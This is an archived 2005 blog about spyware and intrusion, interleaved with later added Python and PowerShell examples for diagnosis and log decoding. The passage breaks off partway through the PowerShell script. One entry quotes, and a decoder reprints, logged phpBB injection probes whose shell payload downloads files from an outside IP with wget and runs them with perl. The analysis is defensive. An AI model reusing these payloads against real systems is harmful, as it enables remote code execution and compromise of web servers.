May 12, 2005

Viewpoint Media Player - Don't click Update!

Have you ever opened up an exam to find that you didn't study the right section of the book? That horrible gut wrenching feeling is what I felt when I read "You have been Updated". After updating your Viewpoint Media Player, which you probably didn't even know you had, it asks you to click "Update" to install a "new browser update" with "advanced pop-up blocking and graphically enhanced search". No X to close the window, no "No thanks", not even a right-click is allowed, just "More info" and "Update". This is so wrong. I don't care what it does, I want "the eye" out of my computer. I'm not the only one.

Kill it. First go to Add or Remove Programs in the Control Panel and remove "Viewpoint Manager". That will clear out the popup. Then uninstall "Viewpoint Media Player". I bet you are feeling better already. I sure am.

Posted by torque at 1:07 PM | Comments (9) | TrackBack

March 11, 2005

Forbes hacked?

I followed a link from Yahoo to Forbes this evening and, huh? "Hello, World! This is now server 192.168.1.87"

Who is 192.168.1.87?

OrgName:    Internet Assigned Numbers Authority 
OrgID:      IANA
Address:    4676 Admiralty Way, Suite 330
City:       Marina del Rey
StateProv:  CA
PostalCode: 90292-6695
Country:    US

NetRange:   192.168.0.0 - 192.168.255.255 
CIDR:       192.168.0.0/16 
NetName:    IANA-CBLK1
NetHandle:  NET-192-168-0-0-1
Parent:     NET-192-0-0-0-0
NetType:    IANA Special Use
NameServer: BLACKHOLE-1.IANA.ORG
NameServer: BLACKHOLE-2.IANA.ORG
Comment:    This block is reserved for special purposes.
Comment:    Please see RFC 1918 for additional information.
Comment:    
RegDate:    1994-03-15
Updated:    2002-09-16

OrgAbuseHandle: IANA-IP-ARIN
OrgAbuseName:   Internet Corporation for Assigned Names and Number 
OrgAbusePhone:  +1-310-301-5820
OrgAbuseEmail:  abuse@iana.org

OrgTechHandle: IANA-IP-ARIN
OrgTechName:   Internet Corporation for Assigned Names and Number 
OrgTechPhone:  +1-310-301-5820
OrgTechEmail:  abuse@iana.org

# ARIN WHOIS database, last updated 2005-03-11 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.

From this it seems more as if there was some router or nameserver issue. I checked the domain registry and, as you might have guessed, forbes.com is well registered, with an expiration date in 2014.

Pinging the domain takes you to 64.240.4.179.

SAVVIS Communications Corporation SAVVIS8 (NET-64-240-0-0-1) 
                                  64.240.0.0 - 64.243.255.255
EBC SAVV-S214013-2 (NET-64-240-4-128-1) 
                                  64.240.4.128 - 64.240.4.255

# ARIN WHOIS database, last updated 2005-03-11 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.

Update. Hmm, maybe it is just me. I checked using a shell account and I can reach the forbes site using lynx using both forbes.com and 64.240.4.179. Interesting, forbes.com uses imrworldwide.com, a.k.a. RedSheriff, Nielsen's baby. Back to topic though, I checked using Remote Desktop from my work, and the site works fine. I think there is something funny with my computer. Reboot?

Update 2. It has something to do with the local network I am on. Both my desktop and my laptop are showing the same message. Strange.
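What the post works out by hand, as an added example (editor's code, not part of the original post): a whois on 192.168.1.87 can only ever return IANA's RFC 1918 block, because that address is private and unreachable from anywhere outside the LAN, so the useful comparison is against the public address the update reports (64.240.4.179, inside the SAVVIS NetRange). The whois text embedded here is the ARIN output quoted above, trimmed to the lines the code reads.

```python
"""Sanity-check the address a site 'is now served from' before reading anything into a whois.

Added example, not part of the original post. 192.168.1.87 (the address the bogus
Forbes page named) lies in RFC 1918 space; 64.240.4.179 (what the shell-account test
in the update reached) lies in the SAVVIS range. The whois text is ARIN output quoted
in the post, trimmed to the lines this code reads.
"""
import ipaddress
import re

ARIN_192_168 = """\
NetRange:   192.168.0.0 - 192.168.255.255
CIDR:       192.168.0.0/16
NetName:    IANA-CBLK1
NetType:    IANA Special Use
Comment:    Please see RFC 1918 for additional information.
"""

ARIN_64_240 = """\
SAVVIS Communications Corporation SAVVIS8 (NET-64-240-0-0-1)
                                  64.240.0.0 - 64.243.255.255
EBC SAVV-S214013-2 (NET-64-240-4-128-1)
                                  64.240.4.128 - 64.240.4.255
"""

RANGE_RE = re.compile(r'(\d{1,3}(?:\.\d{1,3}){3})\s*-\s*(\d{1,3}(?:\.\d{1,3}){3})')


def parse_ranges(whois_text):
    """Every 'first - last' IPv4 range in an ARIN whois answer, in the order printed."""
    return RANGE_RE.findall(whois_text)


def containing_ranges(ip, whois_text):
    """The whois ranges that actually contain ip (ARIN prints the parent block first)."""
    addr = ipaddress.ip_address(ip)
    return [(first, last) for first, last in parse_ranges(whois_text)
            if ipaddress.ip_address(first) <= addr <= ipaddress.ip_address(last)]


def classify(ip):
    """What kind of address this is, independent of any whois lookup."""
    addr = ipaddress.ip_address(ip)
    return {
        'address': str(addr),
        'private': addr.is_private,    # RFC 1918 (10/8, 172.16/12, 192.168/16) for IPv4
        'loopback': addr.is_loopback,
        'global': addr.is_global,      # routable on the public Internet
    }


def diagnose(address_you_got, address_others_get):
    """Compare what your side handed you with what a vantage point outside your LAN sees."""
    mine = ipaddress.ip_address(address_you_got)
    theirs = ipaddress.ip_address(address_others_get)
    if mine == theirs:
        return 'consistent'
    if mine.is_private and theirs.is_global:
        # Nobody outside your LAN can reach a private address, so whatever served
        # you that page sits on your side: resolver, proxy, or router.
        return 'local'
    if mine.is_global and theirs.is_global:
        # Two different public answers: CDN/geo DNS or a real hijack; whois both.
        return 'split'
    return 'unroutable'


if __name__ == '__main__':
    for ip, whois in (('192.168.1.87', ARIN_192_168), ('64.240.4.179', ARIN_64_240)):
        print(ip, classify(ip), 'in', containing_ranges(ip, whois))
    print('verdict:', diagnose('192.168.1.87', '64.240.4.179'))
```

The verdict for the two addresses on this page is "local", which is where the post's second update ends up as well: a private address in the banner means the page came from something on the near side of the router, and the remote site's registration and whois tell you nothing about that.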

Posted by torque at 9:20 PM | Comments (0) | TrackBack

January 10, 2005

Another hacking attempt?

I saw this strange entry in the logs today:

207.218.248.100 xxxxxx.com - [10/Jan/2005:12:28:57 -0800] "GET /archives/cat_web_design.html&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;mkdir%20.temp;cd%20.temp;wget%20http://66.90.79.18/.zk/a.txt;wget%20http://66.90.79.18/.zk/ssh.txt;perl%20a.txt;rm%20a.txt;perl%20ssh.txt;rm%20ssh.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; HTTP/1.1" 404 201 "-" "LWP::Simple/5.803"
LWP is a Perl library. Hmmm, here's some more evil-looking GETs:
69.20.58.133 xxxxxx.com - [10/Jan/2005:12:28:24 -0800] "GET /viewtopic.php?t=547&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 11533 "-" "Mozilla/4.0"
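To see what those requests were actually trying to run, here is an added example (editor's code, not from the original post) that decodes the two log lines exactly as quoted above: it peels off each layer of percent-encoding (the highlight value is encoded twice, so that one decode leaves %27 for the application to decode a second time into a quote), expands the chr(112).chr(101)... concatenation PHP attackers use to hide strings from naive filters, and pulls out the shell command, the download URLs and the "success marker" the scanner expects to see echoed back. The viewtopic.php?t=...&highlight= shape matches the phpBB 2.0.x highlight code-injection bug that was being mass-scanned for at the time. Nothing here contacts 66.90.79.18.

```python
"""Decode the URL-encoded 'highlight' probes from the access log above.

Added example (not code from the original post). The two log lines are copied
verbatim from the post (the site name was already anonymised there as xxxxxx.com).
"""
import re
from urllib.parse import unquote

LOG_LINES = [
    r'''207.218.248.100 xxxxxx.com - [10/Jan/2005:12:28:57 -0800] "GET /archives/cat_web_design.html&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;mkdir%20.temp;cd%20.temp;wget%20http://66.90.79.18/.zk/a.txt;wget%20http://66.90.79.18/.zk/ssh.txt;perl%20a.txt;rm%20a.txt;perl%20ssh.txt;rm%20ssh.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; HTTP/1.1" 404 201 "-" "LWP::Simple/5.803"''',
    r'''69.20.58.133 xxxxxx.com - [10/Jan/2005:12:28:24 -0800] "GET /viewtopic.php?t=547&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 11533 "-" "Mozilla/4.0"''',
]

# Apache combined-style line: client, ident, user, [time], "METHOD target HTTP/x.y", status, size
REQUEST_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<when>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\S+)'
)
CHR_RUN_RE = re.compile(r'(?:chr\(\d+\)\.?)+')      # chr(112).chr(101)... concatenation
MARKER_RE = re.compile(r'print q\((\w+)\)')          # the string the probe expects echoed back
URL_RE = re.compile(r'https?://[^\s;|&"\']+')        # what the payload downloads


def decode_layers(value, limit=5):
    """Percent-decode until the string stops changing; return (text, layers removed)."""
    layers = 0
    while layers < limit:
        decoded = unquote(value)
        if decoded == value:
            break
        value, layers = decoded, layers + 1
    return value, layers


def expand_chr(php_expr):
    """Turn chr(112).chr(101)... into the literal it builds."""
    def join_run(match):
        codes = re.findall(r'chr\((\d+)\)', match.group(0))
        return ''.join(chr(int(c)) for c in codes)
    return CHR_RUN_RE.sub(join_run, php_expr)


def split_target(target):
    """Split a request target into path and raw (still encoded) query pairs.
    The first probe glued '&rush=' straight onto an .html path with no '?',
    so fall back to the first '&' when there is no '?'."""
    sep = '?' if '?' in target else '&'
    path, _, query = target.partition(sep)
    params = {}
    for pair in query.split('&'):
        if pair:
            key, _, raw = pair.partition('=')
            params[key] = raw
    return path, params


def analyse(line):
    """Return the decoded picture of one probe, or None if the line does not parse."""
    m = REQUEST_RE.match(line)
    if m is None:
        return None
    path, raw_params = split_target(m.group('target'))
    params, layers = {}, {}
    for key, raw in raw_params.items():
        text, n = decode_layers(raw)
        params[key] = expand_chr(text)
        layers[key] = n
    # highlight carries the PHP injection; rush (if present) is the shell payload it executes
    injected = params.get('highlight', '')
    command = params.get('rush', '')
    marker = MARKER_RE.search(injected)
    return {
        'client': m.group('client'),
        'status': int(m.group('status')),
        'path': path,
        'params': params,
        'encoding_layers': layers,
        'injected_php': injected,
        'shell_command': command,
        'download_urls': URL_RE.findall(command),
        'rce_marker': marker.group(1) if marker else None,
    }


if __name__ == '__main__':
    for line in LOG_LINES:
        r = analyse(line)
        print(f"{r['client']} -> {r['path']} (HTTP {r['status']})")
        print("  highlight decoded:", r['injected_php'])
        if r['shell_command']:
            print("  shell payload:", r['shell_command'])
            print("  fetches:", r['download_urls'])
        if r['rce_marker']:
            print("  marker to grep for in the response body:", r['rce_marker'])
```

Decoded, the first request becomes `'.passthru($HTTP_GET_VARS[rush]).'` with rush set to `echo _START_; cd /tmp;mkdir .temp;cd .temp;wget http://66.90.79.18/.zk/a.txt;wget http://66.90.79.18/.zk/ssh.txt;perl a.txt;rm a.txt;perl ssh.txt;rm ssh.txt; echo _END_`, and the second becomes `'.system(perl -e "print q(jSVowMsd)").'`. The first probe drew a 404, so the page it aimed at was never there; the second drew a 200 with 11,533 bytes, and the check worth making is whether that body contained the string jSVowMsd, because that is how the scanner decides the injection worked.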

Posted by torque at 12:30 PM | Comments (5) | TrackBack

November 12, 2004

W32.HLLW.Gaobot - Gaobot creates infected runsvc32

What to do? With a few days left for my presentation, I suddenly found my laptop infected with this Gaobot virus. Symantec detected the problem but was unable to clean, disinfect or delete the file. I subsequently deleted runsvc32.exe after rebooting. The funny thing was that this executable was lying in a very random folder. From Greatis Software it is clear that this virus most likely infects through the network, through the DCOM RPC vulnerability. So am I still infected? How do I kill this? Symantec has a removal tool.

Posted by torque at 10:12 PM | Comments (0) | TrackBack

October 28, 2004

Zafi-C

Technically not spyware but just as annoying: Robert Jaques at Forbes today reported on the Zafi-C virus, which targets Google, Microsoft and the newly appointed Hungarian prime minister for distributed denial of service attacks. According to Sophos, it spreads by email attachment with socially engineered subject lines like 'Re: Hey buddy!' and 'Re: very sick little girl!', and it "turns off anti-virus applications, sends itself to email addresses found on the infected computer, forges the sender's email address, uses its own emailing engine and installs itself in the Registry".

Posted by torque at 9:30 AM | Comments (49) | TrackBack

October 15, 2004

Block Undertone Networks

Technically it isn't spyware, but it sort of is. Why isn't my Google pop-up blocker working for Undertone Networks? This article lays it out.

Some new pop-up techniques simply avoid that command, thus subverting blockers that rely on suppressing it. For example, some advertisers are sending pop-ups through a "user initiated command" triggered when people mouse over an object on the page, according to ad executives familiar with the technique.

Posted by torque at 10:08 AM | Comments (6) | TrackBack

September 8, 2004

Hacktool.Rootkit

Thank goodness for Symantec AntiVirus. I got this notification this morning:

Scan type: Realtime Protection Scan
Event: Virus Found!
Virus name: Hacktool.Rootkit
File: C:\Documents and Settings\Owner\Local Settings\Temporary Internet Files\Content.IE5\A54BUXE1\sense[1].txt
Location: C:\Documents and Settings\Owner\Local Settings\Temporary Internet Files\Content.IE5\A54BUXE1
Computer: BRAINWAVE
User: Owner
Action taken: Clean failed : Quarantine failed : Access denied
Date found: Wednesday, September 08, 2004 9:00:26 AM
How did this happen?

Posted by torque at 9:03 AM | Comments (39) | TrackBack

June 6, 2004

Killing the featured-results.com pop-up

This is really depressing. After I delete the suspect files, e.g., inetp60.dll and rundll32.exe, they reappear! Unbelievable. It is self-healing adware. I finally broke down and downloaded PestPatrol which, without payment, won't delete anything.

Here's what I found:

Spyware cookies (Category: Spyware Cookie; Certainty: Confirmed; Threatens: Confidentiality, Liability; Risk: Low; Advice: Delete)

 1. AtlasDMT.com Spyware Cookie: C:\Documents and Settings\Test\Cookies\test@atdmt[2].txt; tracking URL atdmt.com; 3 hits; received 6/5/2004 11:08:36 PM; expires 6/4/2009 5:00:00 PM
 2. Bluestreak.com Spyware Cookie: C:\Documents and Settings\Test\Cookies\test@bluestreak[1].txt; tracking URL bluestreak.com; 5 hits; received 6/6/2004 2:59:32 PM; expires 6/4/2014 10:58:48 AM
 3. DoubleClick Spyware Cookie: C:\Documents and Settings\Test\Cookies\test@doubleclick[1].txt; tracking URL doubleclick.net; 10 hits; received 6/6/2004 7:53:50 AM; expires 6/6/2007 7:53:06 AM
 4. Ehg.Hitbox Spyware Cookie: C:\Documents and Settings\Test\Cookies\test@ehg.hitbox[2].txt; tracking URL ehg.hitbox.com; 2 hits; received 6/6/2004 2:54:50 PM; expires 6/6/2005 2:54:06 PM
 5. HitBox.com Spyware Cookie: C:\Documents and Settings\Test\Cookies\test@hitbox[2].txt; tracking URL hitbox.com; 5 hits; received 6/6/2004 2:54:50 PM; expires 6/6/2005 2:54:06 PM
 6. Statcounter Spyware Cookie: C:\Documents and Settings\Test\Cookies\test@statcounter[2].txt; tracking URL statcounter.com; 3 hits; received 6/6/2004 2:54:36 PM; expires 6/5/2009 2:53:12 PM

Registry entries (Category: Adware; Certainty: Confirmed; Threatens: Confidentiality, Liability; Risk: Low; Advice: Delete or ignore)

 7. AdRoar: HKEY_CLASSES_ROOT\clsid\{fac6e0e1-5d45-4907-bc00-302d702dcc73}
 8. AdRoar: HKEY_CLASSES_ROOT\cpr.iehelperop
 9. AdRoar: HKEY_CLASSES_ROOT\interface\{91d91d21-8008-429d-821c-7266aac84a9f}
10. AdRoar: HKEY_CLASSES_ROOT\typelib\{ace8d3ba-7742-44c4-920d-fd25bd1e8245}
11. AdRoar: HKEY_LOCAL_MACHINE\software\classes\clsid\{fac6e0e1-5d45-4907-bc00-302d702dcc73}
12. AdRoar: HKEY_LOCAL_MACHINE\software\microsoft\internet explorer\toolbar|{bdf6ce3d-f5c5-4462-9814-3c8eac330ca8}
13. AdRoar: HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\browser helper objects\{bdf6ce3d-f5c5-4462-9814-3c8eac330ca8}
14. AdRoar: HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\browser helper objects\{fac6e0e1-5d45-4907-bc00-302d702dcc73}
15. BargainBuddy: HKEY_LOCAL_MACHINE\software\classes\interface\{9d1b86c7-1b93-4586-9009-ea3bd0ad63a5}
16. BargainBuddy: HKEY_LOCAL_MACHINE\software\classes\interface\{b8afa251-4efb-4703-87d4-da7d2435ba5e}
17. BargainBuddy: HKEY_LOCAL_MACHINE\software\classes\interface\{df7d760c-b7e2-4735-bb77-f5a1a9745e16}
18. BrowserAid: HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\runwindowsupdate
19. BrowserAid.ABCSearch: HKEY_CLASSES_ROOT\typelib\{7eb64065-dfd1-41b0-99d7-6ba3e0a15916}
20. BrowserAid.ABCSearch: HKEY_CURRENT_USER\software\popup stopper
21. BrowserPal: HKEY_CURRENT_USER\software\browser pal
22. BrowserPal: HKEY_LOCAL_MACHINE\software\browser pal
23. BrowserPal: HKEY_LOCAL_MACHINE\software\microsoft\internet explorer\extensions\{07b7f771-1b8e-4b7b-823e-ffac1732aa9f}
24. DownloadWare: HKEY_LOCAL_MACHINE\software\classes\btieinscriptconfigproj.btieinscriptconfig
25. DownloadWare: HKEY_LOCAL_MACHINE\software\classes\clsid\{26e8361f-bce7-4f75-a347-98c88b418322}
26. DownloadWare: HKEY_LOCAL_MACHINE\software\classes\interface\{26e8361f-bce7-4f75-a347-98c88b418321}
27. DownloadWare: HKEY_LOCAL_MACHINE\software\classes\typelib\{26e8361f-bce7-4f75-a347-98c88b418328}
28. DownloadWare: HKEY_LOCAL_MACHINE\software\classes\typelib\{53f066f0-a4c0-4f46-83eb-2dfd03f938cf}
29. ExactSearchBar: HKEY_CLASSES_ROOT\typelib\{53f066f0-a4c0-4f46-83eb-2dfd03f938cf}
30. Ezula TopText: HKEY_LOCAL_MACHINE\software\classes\interface\{226a045e-fd4e-4632-b51d-a112bd8254e5}
31. Ezula TopText: HKEY_LOCAL_MACHINE\software\classes\interface\{f6fbfe07-ca76-438e-b34e-4f4dc41f0123}
32. FactoryNetwork Dialer: HKEY_LOCAL_MACHINE\software\dksoftware
33. Gigatech Superbar: HKEY_CLASSES_ROOT\interface\{9d1b86c7-1b93-4586-9009-ea3bd0ad63a5}
34. Gigatech Superbar: HKEY_CLASSES_ROOT\interface\{b8afa251-4efb-4703-87d4-da7d2435ba5e}
35. Gigatech Superbar: HKEY_CLASSES_ROOT\interface\{df7d760c-b7e2-4735-bb77-f5a1a9745e16}
36. HuntBar: HKEY_CLASSES_ROOT\typelib\{26e8361f-bce7-4f75-a347-98c88b418328}
37. IBIS Toolbar: HKEY_CLASSES_ROOT\btieinscriptconfigproj.btieinscriptconfig
38. IBIS Toolbar: HKEY_CLASSES_ROOT\clsid\{26e8361f-bce7-4f75-a347-98c88b418322}
39. IBIS Toolbar: HKEY_CLASSES_ROOT\interface\{26e8361f-bce7-4f75-a347-98c88b418321}
40. IBIS Toolbar: HKEY_CLASSES_ROOT\protocols\handler\relatedlinks
41. IBIS Toolbar: HKEY_CLASSES_ROOT\protocols\name-space handler\res\btlink.resprotocol
42. IGetNet: HKEY_CLASSES_ROOT\interface\{226a045e-fd4e-4632-b51d-a112bd8254e5}
43. IGetNet: HKEY_CLASSES_ROOT\interface\{f6fbfe07-ca76-438e-b34e-4f4dc41f0123}
44. INetSpeak.Iexplorr: HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\browser helper objects\{4cebbc6b-5cee-4644-80cf-38980bae93f6}
45. INetSpeak.Iexplorr: HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\browser helper objects\{6b12dabb-0b7c-44fa-b0b3-4baff3790256}
46. KaZaA: HKEY_CURRENT_USER\software\kazaa
47. KaZaA: HKEY_LOCAL_MACHINE\software\kazaa
48. KaZaA: HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\app paths\d:\installshield\kazaa
49. Marketscore(Netsetter): HKEY_LOCAL_MACHINE\software\netsetter
50. SAHAgent: HKEY_LOCAL_MACHINE\software\vgroup
51. WurldMedia: HKEY_CLASSES_ROOT\tchk.tchkbho

Files (Category: Adware; Certainty: Confirmed; Threatens: Confidentiality, Liability; Risk: Moderate - this file can be executed!; Advice: Delete or quarantine; exceptions noted per item)

52. AdRoar: C:\WINNT\system32\cpr.dll (12/18/2003 10:26:56 AM)
53. AtomWire: C:\WINNT\iexplorr23.dll (4/18/2003 4:32:20 PM)
54. AtomWire: C:\WINNT\iexplorr24.dll (4/18/2003 4:32:42 PM)
55. BargainBuddy: C:\WINNT\system32\msbb.dll (5/5/2003 8:57:50 PM); version resource: exe_in_dll Module, version 1, 0, 0, 1, internal name exe_in_dll, Copyright 2001, original filename exe_in_dll.DLL
56. BargainBuddy: C:\WINNT\system32\msbb1.dll (7/26/2003 7:50:56 AM); same exe_in_dll version resource as 55
57. BargainBuddy: C:\WINNT\system32\mset_bbi8010.dll (5/8/2003 9:30:54 PM); same exe_in_dll version resource as 55
58. BargainBuddy: C:\WINNT\system32\mset_bbi80101.dll (7/22/2003 9:29:44 PM); same exe_in_dll version resource as 55
59. BrowserAid.RunDLL16: C:\WINNT\uptodate.exe (3/25/2003 2:51:10 PM)
60. BrowserAid.SearchandClick: C:\WINNT\system32\inetp60.dll (2/7/2004 9:38:46 AM)
61. CommonName: C:\WINNT\system32\winnet.ini (9/24/2003 9:17:42 PM); Risk: Low
62. Cydoor: C:\Documents and Settings\Test\local settings\temp\cd_clint.dll (1/14/2002 2:57:00 PM); version resource: Cydoor Technologies, Inc., "Cydoor Technologies ad-system", version 3, 2, 1, 0, internal name CD_Clint.dll, Copyright (C) Cydoor Technologies, Inc. 1999-2001
63. ExactSearchBar: C:\WINNT\system32\ezstubi.dll (6/7/2003 6:34:04 PM); same exe_in_dll version resource as 55
64. Ezula TopText: C:\WINNT\system32\ezstubtt.exe (6/7/2003 6:34:04 PM); version resource: LOP Application, version 1, 0, 0, 1, internal name LOP, Copyright (C) 2002, original filename LOP.exe
65. FavoriteMan: C:\WINNT\system32\mbr32.dll (5/10/2004 7:37:00 PM)
66. FavoriteMan: C:\WINNT\system32\mpz300.dll (3/5/2003 4:09:58 PM); version resource: "F1 - Windows help for smart browsing", product F1, version 3, 0, 0, 1, internal name F1, Copyright 2001, original filename F1.DLL
67. IGetNet: C:\WINNT\system\update_com.dll (8/31/2003 11:28:24 AM); version resource: iGetNet.com, "Natural Language Navigation", version 6.00.0005, internal name Rsp001
68. IPInsight: C:\WINNT\sentry.ini (5/4/2003 1:58:02 PM); Risk: Low
69. MSView: C:\WINNT\inf\msview.inf (6/16/2003 1:05:42 PM)
70. MSView: C:\WINNT\msvprep.exe (6/16/2003 1:03:20 PM)
71. NCase: C:\WINNT\system32\ncmyb.dll (7/26/2003 7:53:12 AM)
72. NetPal: C:\WINNT\system32\netpals.dll (8/19/2003 1:54:40 PM); same exe_in_dll version resource as 55
73. NetSetter: C:\WINNT\system32\csloa.dll (4/29/2003 10:16:18 PM); version resource: comScore Inc., "AOL Adapter", product csloa Module, version 3, 0, 5, 41, internal name csloa, Copyright 2000, original filename csloa.DLL
74. SAHAgent: C:\WINNT\sahuninstall.exe (5/6/2003 4:04:42 AM); version resource: SAHUninstall, product "- SAHUninstall", version 1, 1, 1, 17, internal name SAHUninstall, Copyright 2002, original filename SAHUninstall.dll

Directories and leftover files (Category: Adware; Certainty: Confirmed; Threatens: Confidentiality, Liability; Risk: Low; Advice: Delete when empty; exceptions noted per item)

75. BrowserAid.ABCSearch Directory: C:\Documents and Settings\Test\application data\browser pal (6/4/2003 5:55:50 PM)
76. BrowserAid.ABCSearch? (file): C:\Documents and Settings\Test\application data\browser pal\bpcfg.xml (6/4/2003 5:55:50 PM); Certainty: Suspected; Advice: Delete or quarantine
77. BrowserAid.ABCSearch? (file): C:\Documents and Settings\Test\application data\browser pal\pstopper.sts (6/4/2003 10:30:12 PM); Certainty: Suspected; Advice: Delete or quarantine
78. ClearSearch Directory: C:\Documents and Settings\Test\local settings\temp\clrsch (6/6/2004 7:53:12 AM)
79. ClearSearch Directory: C:\Documents and Settings\Test\locals~1\temp\clrsch (6/6/2004 7:53:12 AM)
80. IBIS Toolbar Directory: C:\Program Files\common files\btlink (1/17/2004 7:52:08 PM)
81. Lycos Sidesearch Directory: C:\Program Files\lycos (10/3/2003 9:25:58 PM)
82. Lycos Sidesearch Directory: C:\Program Files\lycos\Sidesearch (12/15/2003 11:15:14 PM)
83. Lycos Sidesearch Directory: C:\Program Files\lycos\Sidesearch\temp (12/16/2003 9:08:22 PM)

Identified binaries (Certainty: Confirmed; Threatens: Liability; Risk: Moderate - this file can be executed!; Advice: Delete or quarantine; File Analysis: look up with MD5 (recommended) or PVT)

84. VX2.MSView (Category: Browser Helper Object; author Mindset Interactive; release date 1/14/2003): C:\WINNT\LastGood\MSView.DLL (12/14/2002 10:17:32 AM); MD5 9de5c18a4ff98fce9c5da6ead8ec5f1b; PVT -122401757; version resource: MSView Inc., "MSView module", product MSView, version 0, 0, 4, 12, internal name MSView, Copyright 2001, 2002, original filename MSView.DLL
85. ClearSearch (Category: Hijacker; author Clear Search, Inc.; release date 1/20/2004): C:\WINNT\system32\ClrSchP012.exe (2/16/2004 9:57:08 PM); MD5 c9ca61949a0c9913ccb8883ad095c115; PVT -1324841362; version resource: Clear Search, "Loader", product Loader, version 1, 0, 0, 3, internal name Loader, Copyright 2003, original filename Loader.exe


Depressing.

Posted by torque at 3:17 PM | Comments (11) | TrackBack

Hijacked search results by featured-results.com

A very annoying thing. I thought this might have been coming from prizesurfer.exe in the last post, but I don't think it is. Here's the symptom: you go to Google, do a search, and surprise, out pop some quasi-helpful paid links not from Google. Yes, you have been hijacked.

Here's what it looks like for a search on "mesothelioma" from Google.

[Screenshot: featured-results.PNG]

Where does this come from? It appears to be some sort of IE plugin. A scan of C:\WINNT\Downloaded Program Files reveals

name                         id                                      CodeBase
                             {26E8361F-BCE7-4F75-A347-98C88B418322}  http://dst.trafficsyndicate.com/Dnl/T_50026/QDow.cab
                             {41F17733-B041-4099-A042-B518BB6A408C}  http://a1540.g.akamai.net/7/1540/52/20021126/qtinstall.info.apple.com/borris/us/win/QuickTimeInstaller.exe
Mediachip AD Player Control  {2D0C7226-747E-11D6-83F0-00E04C4A2F90}  http://www2.sznews.com/movies/MCADPlayer.cab

among others. The rest looks ok. I started by killing the trafficsyndicate.com script, which was "damaged" anyway. Hey, how about that, I think that was it.

Update
It wasn't. I turned on the computer the next day to find the same problem. The offender turned out to be ClearSearch, which you can get rid of by following the instructions in PestPatrol.

Update to the update
I was able to uninstall ClearSearch, but that wasn't it either.
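The "Downloaded Program Files" view only shows part of what Internet Explorer will load. An IE add-on of this kind is usually registered in one or both of two places: as a Browser Helper Object, and in the Code Store Database that backs "Downloaded Program Files" (the same key family that appears in the PrizeSurfer registry list on this page). The read-only inventory below is an added example, not from the original post, that lists both, resolves each CLSID to the DLL that implements it and shows its Authenticode status, so the file can be examined before anything is removed. It assumes Windows PowerShell 5.1 or later run elevated; the two "suspect" hosts are taken from the post's own table and are there only to show how to flag entries by origin.

```powershell
# Added example (not from the original post): read-only inventory of IE
# Browser Helper Objects and Code Store (Downloaded Program Files) entries.

function Resolve-ClsidServer {
    param([string]$Clsid)
    # The DLL implementing a COM class is the default value of its InprocServer32 key.
    foreach ($root in 'HKLM:\SOFTWARE\Classes\CLSID', 'HKCU:\SOFTWARE\Classes\CLSID') {
        $key = Join-Path $root "$Clsid\InprocServer32"
        if (Test-Path -LiteralPath $key) {
            $raw = (Get-ItemProperty -LiteralPath $key).'(default)'
            if ($raw) { return [Environment]::ExpandEnvironmentVariables($raw) }
        }
    }
    return $null
}

function Get-SignatureStatus {
    param([string]$Path)
    if ($Path -and (Test-Path -LiteralPath $Path)) {
        return (Get-AuthenticodeSignature -LiteralPath $Path).Status
    }
    return 'file missing'
}

function Get-BrowserHelperObject {
    $root = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects'
    if (-not (Test-Path -LiteralPath $root)) { return }
    foreach ($sub in Get-ChildItem -LiteralPath $root) {
        $dll = Resolve-ClsidServer $sub.PSChildName
        [pscustomobject]@{
            Source = 'BHO'; Clsid = $sub.PSChildName; File = $dll
            Origin = $null; Signature = Get-SignatureStatus $dll
        }
    }
}

function Get-DownloadedProgramFile {
    # Distribution Units\{CLSID}\DownloadInformation\CODEBASE is the URL the control came from.
    $root = 'HKLM:\SOFTWARE\Microsoft\Code Store Database\Distribution Units'
    if (-not (Test-Path -LiteralPath $root)) { return }
    foreach ($sub in Get-ChildItem -LiteralPath $root) {
        $info = Join-Path $sub.PSPath 'DownloadInformation'
        $codebase = if (Test-Path -LiteralPath $info) { (Get-ItemProperty -LiteralPath $info).CODEBASE } else { $null }
        $dll = Resolve-ClsidServer $sub.PSChildName
        [pscustomobject]@{
            Source = 'DownloadedProgramFiles'; Clsid = $sub.PSChildName; File = $dll
            Origin = $codebase; Signature = Get-SignatureStatus $dll
        }
    }
}

# Hosts taken from the post's own table; extend with whatever you do not recognise.
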